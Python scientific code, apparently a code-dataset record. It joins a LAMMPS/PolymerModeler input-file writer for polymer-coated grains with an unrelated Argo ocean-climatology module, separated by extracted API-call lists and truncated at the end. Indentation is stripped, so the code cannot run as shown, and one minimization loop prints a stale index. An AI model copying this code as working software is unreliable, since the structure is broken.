des.write("# Monomer: z-matrix\n")
des.write(
"%d # Number of atoms in z-matrix (lengths in A, angles in degrees)\n"
% len(polymer_type_custom["monomer"][i + 1]["info"])
)
for j in range(len(polymer_type_custom["monomer"][i + 1]["info"])):
des.write(
str(atom_type[polymer_type_custom["monomer"][i + 1]["info"][j][0]])
+ " "
+ " ".join(polymer_type_custom["monomer"][i + 1]["info"][j][1:])
+ "\n"
)
des.write(
"%d # Number of backbone atoms, z-matrix top\n"
% polymer_type_custom["monomer"][i + 1]["torsion"]["len"]
)
des.write("\n")
des.write("# Monomer: backbone torsion angle probabilities\n")
des.write(
"# Starting with backbone atom 3, specify whether the torsion should change, \n"
)
des.write("# and, if so, how.\n")
des.write("# Values for specification:\n")
des.write("# 0: no change\n")
des.write("# 1: uniform probability for all angles\n")
des.write("# 2: energy levels associated with specific angles\n")
des.write("# 3: probability associated with specific angles\n")
des.write("\n")
if "all" in polymer_type_custom["monomer"][i + 1]["torsion"]:
for j in range(polymer_type_custom["monomer"][i + 1]["torsion"]["len"] - 2):
tor_type = int(
polymer_type_custom["monomer"][i + 1]["torsion"]["all"][0]
)
des.write(
"%d # Torsion %d specification\n"
% (tor_type, (j + 3))
)
if tor_type == 2 or tor_type == 3:
src = open(
"../"
+ polymer_type_custom["monomer"][i + 1]["torsion"]["all"][1]
)
for line in src.readlines():
des.write(line)
src.close()
des.write("\n")
else:
for j in range(polymer_type_custom["monomer"][i + 1]["torsion"]["len"] - 2):
if str(j + 3) in polymer_type_custom["monomer"][i + 1]["torsion"]:
tor_type = int(
polymer_type_custom["monomer"][i + 1]["torsion"][str(j + 3)][0]
)
des.write(
"%d # Torsion %d specification\n"
% (tor_type, (j + 3))
)
if tor_type == 2 or tor_type == 3:
src = open(
"../"
+ polymer_type_custom["monomer"][i + 1]["torsion"][
str(j + 3)
][1]
)
for line in src.readlines():
des.write(line)
src.close()
des.write("\n")
else:
print(
"Backbone torsion angle %d probabilities type for monomer %d not specified, use default with \
no change"
% ((j + 3), (i + 1))
)
tor_type = 0
des.write(
"%d # Torsion %d specification: no change\n"
% (tor_type, (j + 3))
)
des.write("\n")
des.write(
"3.0 # Torsion delta: change in torsions is +/- this value\n"
)
des.write(
"10 # Number of torsion delta steps to minimize torsion energy\n"
)
des.write("\n")
des.write("# Backbone bond length between all monomers (A)\n")
des.write("1.53\n")
des.write("\n")
des.write("# Monomer arrangements\n")
des.write(
"%d # Number of monomer arrangements\n"
% polymer_type_custom["nc"]
)
for i in range(polymer_type_custom["nc"]):
mw[i] = 0
if polymer_type_custom["chain"][i + 1]["arrangement"]["type"]:
des.write(
"1 # Arrangement: 0 = pattern, 1 = probability\n"
)
des.write(
"%s # Probability of monomer(s)\n"
% (
" ".join(
polymer_type_custom["chain"][i + 1]["arrangement"]["sequence"]
)
)
)
length = len(polymer_type_custom["chain"][i + 1]["arrangement"]["sequence"])
for j in range(length):
mw[i] += polymer_type_custom["monomer"][j + 1]["mass"] * float(
polymer_type_custom["chain"][i + 1]["arrangement"]["sequence"][j]
)
else:
des.write(
"0 # Arrangement: 0 = pattern, 1 = probability\n"
)
des.write(
"%d # Number of monomers in first pattern\n"
% polymer_type_custom["chain"][i + 1]["arrangement"]["len"]
)
des.write(
"%s # Repeat...\n"
% (
" ".join(
polymer_type_custom["chain"][i + 1]["arrangement"]["sequence"]
)
)
)
length = polymer_type_custom["chain"][i + 1]["arrangement"]["len"]
for j in polymer_type_custom["chain"][i + 1]["arrangement"]["sequence"]:
mw[i] += polymer_type_custom["monomer"][int(j)]["mass"] / length
r_mw = 0
for i in range(polymer_type_custom["nc"]):
des.write("%f " % polymer_type_custom["chain"][i + 1]["probability"])
r_mw += mw[i] * polymer_type_custom["chain"][i + 1]["probability"]
des.write(" # Probabilities of each monomer arrangement\n")
des.write("\n")
des.write("# System\n")
des.write("nc # Number of chains to build\n")
des.write("nm # Number of monomers per chain\n")
des.write(
"lcx lcy lcz # Dimensions of cell (A); not used if density > 0.0\n"
)
des.write("0.0 # Density in g/cm^3\n")
des.write("\n")
des.write("# Excluded cylinders -- define volumes in which no polymer exists\n")
des.write("1 # Number of excluded cylinders\n")
des.write(
"ccx ccy ccz # Cylinder 1: start position x y z -- cylinder end center \n"
)
des.write(
"dx dy dz # Cylinder 1: direction from start position -- axis\n"
)
des.write("crad # Cylinder 1: radius, extension from axis\n")
des.write("clc # Cylinder 1: length\n")
des.write("\n")
des.write("1 # Included cylinders -- define volumes in which polymers exist\n")
des.write(
"ccx ccy ccz # Cylinder 1 : start position x y z -- cylinder end center\n"
)
des.write("dx dy dz # Cylinder 1 : direction from start position -- axis\n")
des.write("irad # Cylinder 1 : radius, extension from axis\n")
des.write("clc # Cylinder 1 : length\n")
des.write("\n")
des.write("# Excluded slabs -- define volumes in which no polymer exists\n")
des.write("0 # Number of excluded slabs\n")
des.write("\n")
des.write("# Configurations and interactions\n")
des.write("40 # Max number of configurations to test\n")
des.write(
"1.0 # Keep chains which are this fraction of desired length\n"
)
des.write("1 # 1: Self-avoiding\n")
des.write("1 # Self-avoiding cutoff (A)\n")
des.write("1 # 1: Long range interactions\n")
des.write("5 # Interaction cutoff (A)\n")
des.write("5.0 # Bin size (A)\n")
des.write("4 # Bond cutoff\n")
des.write("\n")
des.write("# Output\n")
des.write(
"1 # 1: Write (unwrapped) PDB file of constructed chains\n"
)
des.write(
"1 # 1: Write wrapped PDB file of constructed chains\n"
)
des.write("0 # 1: Write PDB files of monomer rotation\n")
des.write(
"0 # 1: Write output file of chain length vs. # monomers\n"
)
des.write("0 # 1: Write output file of chain length histogram\n")
des.write(
"0 # 1: Write torsion angle probabilities, selection histogram\n"
)
des.write("0 # 1: Write z-matrices of all chains\n")
des.write("0 # 1: Write final system energy\n")
des.write("\n")
des.write("#\n")
des.write("# Status and messages\n")
des.write("#\n")
des.write("1 # 1: Write messages to stdout; 0: Write to file\n")
des.write(
"# If previous line is 1, nothing more is needed; if it is 0, file name follows\n"
)
des.write("#/path/to/log.build\n")
des.write("1 # 1: Write status to stdout; 0: Write to file\n")
des.write(
"# XXX Only one of status.build or bar/Rappture flag should be uncommented!!\n"
)
des.write("# If writing status to file, file name follows\n")
des.write("#/path/to/status.build\n")
des.write(
"# ELSE if writing status to stdout, 1: terminal bar, 0: Rappture status lines\n"
)
des.write("1\n")
des.write("\n")
des.write("# RNG seed; use time if 0\n")
des.write("0 \n")
des.write("\n")
des.write(
"# Scale factor used to compare atom distances in monomer to equilibrium bond\n"
)
des.write(
"# distances when searching for bonds not specified in monomer z-matrix\n"
)
des.write("1.1\n")
des.write("\n")
des.close()
return r_mw
def write_minimize(ofile, X6file, afile):
des = open(ofile, "w")
des.write("# General parameters\n")
des.write("units real\n")
des.write("atom_style full\n")
des.write("boundary p p p\n")
des.write("special_bonds lj/coul 0.0 0.0 1.0 dihedral yes\n")
des.write("dielectric 1.0\n")
des.write("pair_style lj/cut 12.0\n")
des.write("bond_style harmonic\n")
des.write("angle_style harmonic\n")
des.write("dihedral_style harmonic\n")
des.write("improper_style harmonic\n")
des.write("read_data step0.data # polymer_relax.data\n")
des.write("neighbor 0.3 bin\n")
des.write(
"thermo_style custom step etotal ke temp pe ebond eangle edihed eimp evdwl ecoul elong press pxx pyy pzz \
pxy pxz pyz lx ly lz vol density\n"
)
des.write("thermo 10\n")
des.write("thermo_modify flush yes\n")
des.write("fix LB all balance 1000 1.05 shift xy 10 1.05\n")
des.write("# Minimization parameters\n")
des.write("min_style cg # hftn\n")
des.write("min_modify dmax 0.02\n")
des.write("min_modify line quadratic # backtrack\n")
des.write("neigh_modify every 1 delay 0\n")
LJ_params = {
"H": [3.195, 0.0152],
"C": [3.8983, 0.0951],
"N": [3.6621, 0.0774],
"O": [3.4046, 0.0957],
"F": [3.4720, 0.0725],
"S": [4.0300, 0.3440],
"Cl": [3.9503, 0.2833],
"Si": [4.27, 0.31],
}
d0_to_epsilon = 1.0
r0_to_sigma = 1.0 / (2.0 ** (1.0 / 6.0))
lj_D0 = {}
lj_R0 = {}
src = open(afile)
el_types = {}
for line in src.readlines():
ln = line.split()
if ln:
el_types[int(ln[0])] = ln[1].split("_")[0]
ntypes = len(el_types)
for i in range(ntypes):
lj_R0[i] = {}
lj_D0[i] = {}
param_i = LJ_params[el_types[i + 1]]
for j in range(i, ntypes):
param_j = LJ_params[el_types[j + 1]]
lj_R0[i][j] = np.sqrt(param_i[0] * param_j[0])
lj_D0[i][j] = np.sqrt(param_i[1] * param_j[1])
lammps_min_steps = 5000
lammps_min_levels = 3
lammps_min_init = 0.5
dp = (1.0 - lammps_min_init) / (lammps_min_levels - 1)
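    # Staged minimization: LJ well depths and radii are ramped from
    # lammps_min_init up to full strength in equal steps, minimizing at each
    # level so initially overlapping chains can relax without blowing up.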
for level in range(lammps_min_levels):
des.write("# Minimization %d\n" % (i + 1))
for i in range(ntypes):
for j in range(i, ntypes):
des.write("pair_coeff %d %d " % (i + 1, j + 1))
d0 = lj_D0[i][j] * (lammps_min_init + dp * level)
r0 = lj_R0[i][j] * (lammps_min_init + dp * level)
des.write("%f %f\n" % (d0 * d0_to_epsilon, r0 * r0_to_sigma))
des.write("minimize 1.0e-9 1.0e-9 %d 100000\n" % lammps_min_steps)
des.write("# Dump minimized system\n")
des.write("dump 1 all atom 1 min.dump\n")
des.write("dump_modify 1 image yes scale no\n")
des.write("run 0\n")
des.write("undump 1\n")
des.write("# MD parameters\n")
des.write("neigh_modify every 1 delay 5\n")
des.write("pair_style buck/coul/long 12.0 12.0\n")
des.write("kspace_style pppm 1e-4\n")
src = open(X6file)
for line in src.readlines():
des.write(line)
des.write("minimize 1.0e-9 1.0e-9 %d 100000\n" % lammps_min_steps)
des.write("write_data step1.data\n")
des.write("\n")
# def main(args):
# args = complete_args(args)
# os.system("cp polymer_types/" + polymer_type + "/* .")
# Get number of chains, molecules
# p_fra = 0.05
# if "p_fra" in args:
# if len(args["p_fra"]) == 1:
# p_fra = eval(args["p_fra"][0])
# if p_fra < 0 or p_fra > 1:
# print("Please input a valid number between 0 to 1")
# return False
# else:
# print(
# "Molecular weight fraction of polymer coated: "
# + str(p_fra * 100)
# + "%"
# )
# else:
# print("Please specify molecular weight fraction of polymer coated")
# return False
# else:
# print("Default 5% molecular weight fraction of polymer coated")
# nm = 40
# if "nm" in args:
# if len(args["nm"]) == 1:
# nm = eval(args["nm"][0])
# if nm < 1:
# print("Please input a valid number equal or larger than 1")
# return False
# else:
# print(str(int(nm)) + " monomers per chain")
# else:
# print("Please specify number of monomers per chain")
# return False
# else:
# print("Default 40 monomers per chain")
# mctemp = 600
# if "mctemp" in args:
# if len(args["mctemp"]) == 1:
# mctemp = eval(args["mctemp"][0])
# if mctemp < 0:
# print("Please input a valid number equal or larger than 0")
# return False
# else:
# print("Monte Carlo temperature: " + str(mctemp) + " K")
# else:
# print("Please specify Monte Carlo temperature")
# return False
# else:
# print("Default Monte Carlo temperature: 600 K")
# np_flag = 0
# rnp_flag = 0
# if "parallel" in args:
# np_flag = 1
# print("LAMMPS will run in parallel mode")
# if len(args["parallel"]) > 0:
# if args["parallel"] == ["np"]:
# if len(args["parallel"]) > 1:
# np = int(eval(args["parallel"][1]))
# if np <= 0:
# print("Please input a valid number larger than 0")
# return False
# else:
# print("%d of processors will be in use" % np)
# else:
# print("Please input a number of processors you want to use")
# return False
# else:
# rnp_flag = 1
# print(
#                     "Will calculate the recommended number of processors after the initial polymer configuration is generated"
# )
# else:
# rnp_flag = 1
# print(
#                     "Will calculate the recommended number of processors after the initial polymer configuration is generated"
# )
# print("Running Lammps, get information about grain")
# Run Lammps, get information about grain
# Center of cylinder from upper and lower coordinates
# input_file(datafile)
# os.chdir('..')
# writeinlammps(datafile, potential_headfile, potentialfile)
# run_lammps()
# os.system('mv inr.lammps code')
# os.system('mv log.lammps code')
# os.system('mv tmp.out code')
# os.chdir('code')
# cell_sizes, delta_cell = read_cell_sizes("../" + datafile)
# periodic = min(delta_cell.items(), key=lambda x: x[1])[0]
# mass, com, boundaries, coord, radius = get_boundaries(periodic)
# dimension = 2
# plane = "xy"
# writeghostdata("../" + datafile)
# Dir_seed = read_data("ghost_grain.data")
# center = Get_Center_of_Mass(Dir_seed)
# D, center = Get_Mass_Radius(Dir_seed, center, dimension, plane)
# radius = math.ceil(D) + 5
# print("Grain Radius:", D) #'Coordinates cylinder: ', coord,
# GD = D
# nc = calc_polymer(mass, nm, polymer_type, p_fra, custom=mw)
# Get new cell for polymod
# Run polymod
# shift, cell_polymod, cpos, caxis, clength = parameters(
# periodic, cell_sizes, coord, boundaries, radius
# )
# input_polymod(nc, nm, cell_polymod, cpos, caxis, radius, clength, mctemp)
# p_flag = 1
# while p_flag:
# print("Running PolymerModeler, generate initial configuration of polymers")
# run_polymod()
# shutil.copy("atoms.dat", "./str2lammps/types")
# shutil.copy("bonds.dat", "./str2lammps/types")
# p = polymer_type.split("-")[0]
# shutil.copy(
# "./str2lammps/types/%s_atom_type.dat" % p,
# "./str2lammps/types/atom_type.dat",
# )
# shutil.copy("./str2lammps/types/%s_atom_type.dat" % p, "%s_atom_type.dat" % p)
# shutil.copy("bond_type.dat", "./str2lammps/types")
# addatomtype("%s_atom_type.dat" % p, "atom_type.dat", elementlist)
# Str2Lammps
# os.chdir("./str2lammps/")
# print os.getcwd()
# new_typing, data4lammps = run_data4lammps("Gasteiger", "Dreiding", cell_polymod)
# subprocess.Popen(new_typing, shell=True,
# stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# print(data4lammps)
# print("Generating initial polymer datafile")
# os.system(data4lammps)
# return_code = subprocess.Popen(data4lammps, shell=True,
# stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# stdout,stderr = return_code.communicate()
# os.chdir("../unwrap/")
# print("Unwrap polymers")
# os.system("../lmp_mpi < uw.in")
# return_code = subprocess.Popen('../lmp_mpi < uw.in', shell=True,
# stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# stdout,stderr = return_code.communicate()
# dump2data("expanded.data", "unwrap.dump", "step0.data")
# os.chdir("..")
# os.system("cp unwrap/step0.data .")
# os.system("cp unwrap/unwrap.dump .")
# Dir_dump = read_dump("unwrap.dump")
# na = 0
# for t in Dir_dump:
# na = Dir_dump[t]["NUMBER OF ATOMS"]
# break
# write_minimize(
# "minimize.in",
# "str2lammps/X6paircoeffs.txt",
# "str2lammps/types/%s_atom_type.dat" % p,
# )
# if rnp_flag:
# print("Calculating recommended number of processors")
# ppn = grabprocessors("minimize.in")
# print(ppn)
# nodes, ppn, np = correctppn(ppn)
# print("%d of processors will be in use" % np)
# print("Running LAMMPS, minimize the intial configuration")
# if np_flag:
# os.system("mpiexec -np %d ./lmp_mpi < minimize.in" % np)
# else:
# os.system("./lmp_mpi < minimize.in")
# return_code = subprocess.Popen('./lmp_mpi < minimize.in', shell=True,
# stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# stdout,stderr = return_code.communicate()
# os.system("cp log.lammps log.minimize")
#     print("Running 10 steps for coating")
# center = [cpos[0], cpos[1], 0]
# for i in range(10):
# print("Step %d" % (i + 1))
# input_coat4(
# na, cpos, "step%d.data" % (i * 3 + 1), "step%d.data" % (i * 3 + 2)
# )
# print("Running LAMMPS, assign velocities")
# os.system("./lmp_mpi < run_coat4.in")
# return_code = subprocess.Popen('./lmp_mpi < run_coat4.in', shell=True,
# stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# stdout,stderr = return_code.communicate()
# os.system("cp log.lammps log.run_coat4_%d" % i)
# Dir_seed = read_data("step%d.data" % (i * 3 + 2))
# oradius, center = Get_Mass_Radius(Dir_seed, center, dimension, plane)
# print("Current outter radius:", oradius)
# Dir = read_data("step%d.data" % (i * 3 + 2))
# if "Pair Coeffs" in Dir:
# del Dir["Pair Coeffs"]
# write_data(Dir, "step%d.data" % (i * 3 + 3))
# input_coat5(
# cpos,
# radius - 5,
# oradius,
# "step%d.data" % (i * 3 + 3),
# "step%d.data" % (i * 3 + 4),
# i * 5000,
# "str2lammps/X6paircoeffs.txt",
# mctemp,
# )
# print("Running LAMMPS, coat polymers")
# if np_flag:
# os.system("mpiexec -np %d ./lmp_mpi < run_coat5.in" % np)
# else:
# os.system("./lmp_mpi < run_coat5.in")
# return_code = subprocess.Popen('./lmp_mpi < run_coat5.in', shell=True,
# stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# stdout,stderr = return_code.communicate()
# os.system("cp log.lammps log.run_coat5_%d" % i)
# if not os.path.exists("step%d.data" % (i * 3 + 4)):
# break
# if os.path.exists("step31.data"):
# os.system("mv step31.data ../polymer.data")
# p_flag = 0
# else:
# print("Failed. Generating another configuration")
# print("Polymer datafile polymer.data is ready, now combining with grain datafile")
# Dir_polymer = read_data("../polymer.data")
# vector = [-cpos[0], -cpos[1], 0]
# Dir_polymer = data_Translation(Dir_polymer, vector, box=1)
# vector = [-coord["x"], -coord["y"], 0]
# Dir_RDX = data_Translation(Dir_RDX, vector)
# Dir_data = add_data(Dir_polymer, Dir_RDX)
# write_data(Dir_data, "../initial_polymer_grain.data", v=0)
# print("Initial combined datafile initial_polymer_grain.data is ready to use")
# print("Center Coordinates: x, ", 0, "y, ", 0)
# print("Calculating initial polymer thickness")
# Dir_seed = read_data("../initial_polymer_grain.data")
# center = [0, 0, 0]
# D, center = Get_Mass_Radius(Dir_seed, center, dimension, plane)
# PT = D - GD
# print("Initial polymer thickness:", PT)
# des=open('p_thickness.dat','w')
# des.write(str(PT))
# des.close()
# shutil.copy("atom_type.dat", "./str2lammps/types")
# os.chdir("./str2lammps/")
# new_typing, data4lammps = run_data4lammps("Gasteiger", "Dreiding", cell_polymod)
# print("Generating new potentialfile")
# os.system(data4lammps)
# os.chdir("..")
# shutil.copy("./str2lammps/X6paircoeffs.txt", "X6paircoeffs.txt")
# shiftpotential("X6paircoeffs.txt", "../potential.mod", "potential.mod", Dir_polymer)
#     print("Running 10 steps for coating with grain")
# center = [0, 0, 0]
# input_coat6(na, "../initial_polymer_grain.data", "step32.data")
# if rnp_flag:
# print("Calculating recommended number of processors")
# ppn = grabprocessors("run_coat6.in")
# print(ppn)
# nodes, ppn, np = correctppn(ppn)
# print("%d of processors will be in use" % np)
# for i in range(10):
# print("Step %d" % (i + 1))
# if i:
# input_coat6(na, "step%d.data" % (i * 3 + 31), "step%d.data" % (i * 3 + 32))
# print("Running LAMMPS, assign velocities")
# os.system("./lmp_mpi < run_coat6.in")
# return_code = subprocess.Popen('./lmp_mpi < run_coat4.in', shell=True,
# stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# stdout,stderr = return_code.communicate()
# os.system("cp log.lammps log.run_coat6_%d" % i)
# Dir_seed = read_data("step%d.data" % (i * 3 + 32))
# oradius, center = Get_Mass_Radius(Dir_seed, center, dimension, plane)
# print("Current outter radius:", oradius)
# input_coat7(
# oradius,
# "step%d.data" % (i * 3 + 32),
# "step%d.data" % (i * 3 + 33),
# i * 5000,
# Dir_polymer["atom types"],
# len(elementlist),
# mctemp,
# )
# print("Running LAMMPS, coat polymers")
# if np_flag:
# os.system("mpiexec -np %d ./lmp_mpi < run_coat7.in" % np)
# else:
# os.system("./lmp_mpi < run_coat7.in")
# return_code = subprocess.Popen('./lmp_mpi < run_coat5.in', shell=True,
# stdin=subprocess.PIPE, stdout=subprocess.PIPE,
# stderr=subprocess.PIPE)
# stdout,stderr = return_code.communicate()
# os.system("cp log.lammps log.run_coat7_%d" % i)
# Dir = read_data("step%d.data" % (i * 3 + 33))
# if "Pair Coeffs" in Dir:
# del Dir["Pair Coeffs"]
# if "Bond Coeffs" in Dir:
# del Dir["Bond Coeffs"]
# if "Angle Coeffs" in Dir:
# del Dir["Angle Coeffs"]
# if "Dihedral Coeffs" in Dir:
# del Dir["Dihedral Coeffs"]
# if "Improper Coeffs" in Dir:
# del Dir["Improper Coeffs"]
# write_data(Dir, "step%d.data" % (i * 3 + 34))
# os.system("mv step61.data ../%s" % output)
# print("Datafile %s is ready to use" % output)
# print("Center Coordinates: x, ", 0, "y, ", 0)
# print("Calculating initial polymer thickness")
# Dir_seed = read_data("../%s" % output)
# center = [0, 0, 0]
# D, center = Get_Mass_Radius(Dir_seed, center, dimension, plane)
# PT = D - GD
# print("Polymer thickness:", PT)
# des = open("p_thickness.dat", "w")
# des.write(str(PT))
# des.close()
# return True
def zen(with_attribution=True):
quote = """Beautiful is better than ugly.
Explicit is better than implicit.
Simple is better than complex.
Complex is better than complicated.
Flat is better than nested.
Sparse is better than dense.
Readability counts.
Special cases aren't special enough to break the rules.
Although practicality beats purity.
Errors should never pass silently.
Unless explicitly silenced.
In the face of ambiguity, refuse the temptation to guess.
There should be one-- and preferably only one --obvious way to do it.
Although that way may not be obvious at first unless you're Dutch.
Now is better than never.
Although never is often better than *right* now.
If the implementation is hard to explain, it's a bad idea.
If the implementation is easy to explain, it may be a good idea.
Namespaces are one honking great idea -- let's do more of those!"""
if with_attribution:
quote += "\n\t<NAME>"
return quote
def canvas(with_attribution=True):
"""
Placeholder function to show example docstring (NumPy format)
Replace this function and doc string for your own project
Parameters
----------
with_attribution : bool, Optional, default: True
Set whether or not to display who the quote is from
Returns
-------
quote : str
Compiled string including quote and optional attribution
"""
quote = "The code is but a canvas to our imagination."
if with_attribution:
quote += "\n\t- Adapted from <NAME>"
return quote
if __name__ == "__main__":
# Do something if this file is invoked on its own
print(canvas())
infile = sys.argv[1]
# args = polymerxtal.read_input(infile)
# main(args)
|
[
"os.path.join",
"numpy.sqrt"
] |
[((3267, 3301), 'os.path.join', 'os.path.join', (['directory', '"""main.py"""'], {}), "(directory, 'main.py')\n", (3279, 3301), False, 'import os, sys, os.path\n'), ((3315, 3357), 'os.path.join', 'os.path.join', (['directory', '"""doAtomTyping.py"""'], {}), "(directory, 'doAtomTyping.py')\n", (3327, 3357), False, 'import os, sys, os.path\n'), ((19477, 19487), 'numpy.sqrt', 'np.sqrt', (['D'], {}), '(D)\n', (19484, 19487), True, 'import numpy as np\n'), ((42059, 42091), 'numpy.sqrt', 'np.sqrt', (['(param_i[0] * param_j[0])'], {}), '(param_i[0] * param_j[0])\n', (42066, 42091), True, 'import numpy as np\n'), ((42118, 42150), 'numpy.sqrt', 'np.sqrt', (['(param_i[1] * param_j[1])'], {}), '(param_i[1] * param_j[1])\n', (42125, 42150), True, 'import numpy as np\n')]
|
import numpy as np
import pandas as pd
import tools
import tiles
import interp
import computational as cpt
import matplotlib.pyplot as plt
import gsw
from scipy import interpolate
from scipy import integrate
import os
# plt.ion()
time_flag = 'annual' # 'DJF' # 'annual'
typestat = 'zmean'
seasons = ['DJF', 'MAM', 'JJA', 'SON']
var_stats = ["W", "CT", "SA", "CT_STD", "BVF2_STD", "RSTAR", "CF"]
attributes = {"W": ("weight (dimensionless)", "1", [0., 10000.]),
"CT": ("conservative temperature", "degC", [-3., 50.]),
"SA": ("absolute salinity", "g kg-1", [0., 50.]),
"CT_STD": ("CT standard deviation", "degC", [0., 20.]),
"BVF2_STD": ("square of Brunt Vaisala Frequency standard deviation", "s-1", [0., 1e-2]),
"RSTAR": ("compensated density", "kg m-3", [1000., 1032.]),
"CF": ("compressibility factor (dimensionless)", "1", [0.99, 1.])}
global_attributes = {
"title": "World Ocean Climatology of mean temperature, salinity and compensated density"
}
tiles_dir = "%s/%g/stats" % (tiles.tiles_dir, tiles.reso)
var_dir = {v: tiles_dir+"/%s" % v for v in var_stats}
tiles_file = "%s/stats_%s.pkl" # % (var_dir[var], tile)
zref = tools.zref
threshold = 5e-2
def create_folders():
for d in [tiles_dir]+list(var_dir.values()):
if os.path.exists(d):
pass
else:
os.makedirs(d)
def compute_avg(j, i, lonr, latr, latdeg, LONr, LATr, resor, data):
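    # Weighted climatology at grid node (j, i): profiles whose distance-based
    # weight exceeds `threshold` contribute weighted means and standard
    # deviations of CT, SA and BVF2 at every zref level.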
# if True:
w = cpt.compute_weight(lonr[i], latr[j], LONr, LATr, resor)
clim = pd.DataFrame(0., columns=var_stats, index=zref)
profiles_to_use = (w > threshold)
tags = profiles_to_use.index
w = w[tags]
totalweight = w.sum()
print(" weight=%2.1f" % (totalweight), end="")
if totalweight < 2:
clim[:] = np.nan
else:
CT = data["CT"].loc[tags, :]
SA = data["SA"].loc[tags, :]
BVF2 = data["BVF2"].loc[tags, :]
bad = CT.isna() | (CT < -3) | (CT > 50) | (SA < 0) | (SA > 50)
nz = len(zref)
#weight = w[:, np.newaxis]*np.ones((nz,))
weight = CT.copy()
weight.iloc[:, :] = w[:, np.newaxis]
weight[bad] = 0.
CT[bad] = 0.
SA[bad] = 0.
W = np.sum(weight, axis=0)
clim.W[:] = W
z0 = np.sum(CT * weight, axis=0)
z2 = np.sum(CT*CT * weight, axis=0)
clim.CT[:] = z0/W
sigma = np.sqrt((z2-z0*z0/W)/(W-1))
clim.CT_STD[:] = sigma
z0 = np.sum(SA * weight, axis=0)
clim.SA[:] = z0/W
z0 = np.sum(BVF2 * weight, axis=0)
z2 = np.sum(BVF2*BVF2 * weight, axis=0)
sigma = np.sqrt((z2-z0*z0/W)/(W-1))
clim.BVF2_STD[:] = sigma
if True:
rhostar, compf = comp_rhostar(clim.SA, clim.CT, latdeg)
clim.RSTAR[:] = rhostar
clim.CF[:] = compf
clim[clim == 0.] = np.nan
return clim, tags
def comp_rhostar(Si, Ti, lat):
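    # Compressibility factor E(z) = exp(-integral of g/c^2 dz), accumulated
    # piecewise with a trapezoidal rule; returns the compensated density Ri*E
    # together with E itself.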
pi = gsw.p_from_z(-zref, lat)
cs = gsw.sound_speed(Si, Ti, pi)
Ri = gsw.rho(Si, Ti, pi)
g = gsw.grav(lat, pi[0])
E = np.zeros((len(zref),))
#plt.plot(Ri, -zref)
f = interpolate.interp1d(zref, cs)
def e(x): return -g/f(x)**2
if True:
for k, z in enumerate(zref):
if k == 0:
r, E[k] = 0., 1.
else:
#r1,p = integrate.quad(e,zref[k-1],z,epsrel=1e-1)
x = np.linspace(zref[k-1], z, 10)
dx = x[1]-x[0]
r1 = integrate.trapz(e(x), dx=dx)
r += r1
E[k] = np.exp(r)
return Ri*E, E
def get_grid_on_box(b):
reso = tiles.reso
lonmin = np.ceil(b["LONMIN"]/reso)*reso
lonmax = np.floor(b["LONMAX"]/reso)*reso
latmin = np.ceil(b["LATMIN"]/reso)*reso
latmax = np.floor(b["LATMAX"]/reso)*reso
latmin = max(latmin, -80) # TODO: replace with min(latglo)
latmax = min(latmax, 80) # TODO
lon = np.arange(lonmin, lonmax+reso, reso)
lat = np.arange(latmin, latmax+reso, reso)
return lat, lon
def compute_stats(bb, tile):
# read more than just one tile => to cope with the halo
tile_list, rect = tiles.tiles_with_halo(bb, tile)
argo = tiles.read_argo_tile(tile_list)
data = interp.read_profiles(tile_list)
#argo = tiles.extract_in_tile(argo, rect)
argo = argo[argo.STATUS == "D"]
for var in data.keys():
data[var] = data[var].loc[argo.index, :]
reso = tiles.reso
zref = tools.zref
CT = data['CT']
SA = data['SA']
# patch TO REMOVE LATER
CT.iloc[:, 1] = 0.5*(CT.iloc[:, 0]+CT.iloc[:, 2])
SA.iloc[:, 1] = 0.5*(SA.iloc[:, 0]+SA.iloc[:, 2])
LON = argo['LONGITUDE']
LAT = argo['LATITUDE']
lat, lon = get_grid_on_box(bb[tile])
LONr = np.deg2rad(LON)
LATr = np.deg2rad(LAT)
lonr = np.deg2rad(lon)
latr = np.deg2rad(lat)
resor = np.deg2rad(reso)
nlon, nlat, nz = len(lon), len(lat), len(zref)
CTbar = np.zeros((nlat, nlon, nz))
SAbar = np.zeros((nlat, nlon, nz))
CTstd = np.zeros((nlat, nlon, nz))
BVF2std = np.zeros((nlat, nlon, nz))
RHOSTAR = np.zeros((nlat, nlon, nz))
CF = np.zeros((nlat, nlon, nz))
W = np.zeros((nlat, nlon, nz))
monitor_file = "monitor_%s.txt" % tile
with open(monitor_file, "w") as fid:
fid.write("MEANSTATE / #profiles: %i / nlat x nlon: %i" % (len(argo), nlat*nlon))
#fig = plt.figure()
for j in range(nlat):
for i in range(nlon):
print("\r j=%2i/%i-%2i/%i" % (j, nlat, i, nlon), end="")
clim, tags = compute_avg(
j, i, lonr, latr, lat[j], LONr, LATr, resor, data)
CTbar[j, i, :] = clim["CT"]
SAbar[j, i, :] = clim["SA"]
CTstd[j, i, :] = clim["CT_STD"]
BVF2std[j, i, :] = clim["BVF2_STD"]
RHOSTAR[j, i, :] = clim["RSTAR"]
CF[j, i, :] = clim["CF"]
W[j, i, :] = clim["W"]
# fig.canvas.draw()
mapvar = {"CT": CTbar, "SA": SAbar, "CT_STD": CTstd,
"BVF2_STD": BVF2std,
"RSTAR": RHOSTAR, "CF": CF, "W": W}
print()
for var in var_stats:
v = mapvar[var]
d = var_dir[var]
f = tiles_file % (d, tile)
print("write %s" % f)
pd.to_pickle(v, f)
os.system("rm %s" % monitor_file)
def read(tile, var, transpose=True):
d = var_dir[var]
f = tiles_file % (d, tile)
print(f)
if os.path.exists(f):
data = pd.read_pickle(f)
if transpose:
data = np.transpose(data, (2, 0, 1))
else:
data = None
return data
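

# Hypothetical usage sketch (added for illustration; not part of the original
# module). It only exercises the pure grid helper above, with an example box
# whose keys match what get_grid_on_box expects.
if __name__ == "__main__":
    demo_box = {"LONMIN": -10.0, "LONMAX": 5.0, "LATMIN": 40.0, "LATMAX": 52.0}
    lat, lon = get_grid_on_box(demo_box)
    print("grid: %d lat x %d lon points" % (len(lat), len(lon)))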
|
[
"numpy.sum",
"numpy.floor",
"numpy.arange",
"numpy.exp",
"pandas.to_pickle",
